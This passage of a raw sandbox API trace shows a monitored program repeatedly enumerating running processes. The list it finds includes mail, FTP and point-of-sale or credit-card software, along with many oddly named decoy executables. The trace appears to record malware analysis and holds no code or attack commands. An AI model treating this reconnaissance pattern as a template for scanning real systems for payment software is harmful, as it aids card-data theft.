dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0238.511] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0238.514] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0238.517] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0238.519] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0238.525] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0238.528] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0238.531] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0238.533] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0238.537] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0238.540] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0238.542] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0238.545] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0238.551] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0238.555] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0238.557] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0238.568] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0238.571] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0238.574] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0238.577] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0238.580] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0238.582] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0238.585] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0238.588] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0238.591] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0238.593] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0238.600] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0238.602] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.605] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0238.608] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.612] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0238.614] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0238.618] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.621] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0238.623] CloseHandle (hObject=0x2298) returned 1 [0238.623] Sleep (dwMilliseconds=0x64) [0238.727] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x229c [0238.740] Process32First (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.742] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.743] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.745] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.747] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.749] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.750] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.752] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.754] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.756] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.758] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.759] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.761] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.762] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.802] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.804] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.806] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.807] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.809] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.812] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.813] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.816] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.818] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.819] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.821] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.823] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.824] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0238.827] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0238.829] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0238.831] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.834] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.836] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.877] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.881] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.884] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.886] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.889] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.891] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.893] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0238.895] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0238.897] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0238.899] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0238.902] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0238.904] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0238.907] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0238.909] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0238.912] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0238.955] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0238.957] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0238.959] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0238.961] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0238.964] Process32Next (in: hSnapshot=0x229c, lppe=0x102efe20 | out: 